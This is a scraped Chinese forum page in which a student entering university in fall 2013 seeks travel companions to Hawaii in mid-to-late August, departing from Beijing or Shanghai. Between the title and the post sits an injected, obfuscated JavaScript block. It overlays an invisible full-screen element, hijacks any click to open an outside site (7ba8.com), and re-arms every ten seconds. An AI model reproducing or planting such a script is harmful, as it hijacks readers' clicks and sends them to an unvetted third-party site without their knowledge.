2013 fall 8月中下旬 夏威夷 求飞友同行

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script> 本帖最后由 moonga001 于 2013-8-14 10:30 编辑
下午好,想问一下大家,8月中下旬有没有去夏威夷的,求同行。本人2013fall入学,想找同学一起去。如果有人同去请给我留言,也可以加我QQ  , 同时这也是我的邮箱,我Q版本比较老,最近老登不上去,所以留言或直接发我邮箱我会查看更迅速。因为这所学校相对而言比较非主流一些,感觉去那边的同学相对少一些,希望能够找到同行的人。至于出发地,家在北方,比较倾向北京,上海也可以,广州离我家就比较远了,应该不会从广州走。如果有同学去,希望能联系我。祝大家一切顺利。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部